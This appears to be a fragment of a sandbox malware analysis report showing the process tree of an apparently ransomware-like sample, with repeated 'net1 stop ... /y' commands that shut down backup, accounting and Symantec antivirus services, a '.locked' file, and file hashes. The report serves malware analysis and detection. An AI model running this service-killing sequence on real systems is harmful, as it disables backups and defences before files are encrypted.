C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:2264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:1612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:1948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵PID:1960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:2088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵PID:268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:2256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:2020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵PID:2432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:2780
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestartShow.zip.locked1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2164
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:2316
-
C:\Program Files\Windows Sidebar\sidebar.exe"C:\Program Files\Windows Sidebar\sidebar.exe" /showGadgets1⤵PID:1596
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5162b05048ff177fc1fa3ab255a8e420e
SHA1e6369fec5f4be5aa02ca9340a70089c0a296e3ac
SHA25643b54e3ac3de5fcdb21e6c6c7a31ead326fa11cedf972a87bdbd95330c9bdcb4
SHA512c23243384fce8ec857ee27fc40228ae4ad66f9a23fa55a31f9d6cef8dc7f8e4923ffb821e1d6fdbb739c9d6705e0a8538d1d010f2eb4d06d63d9d3375a3a5631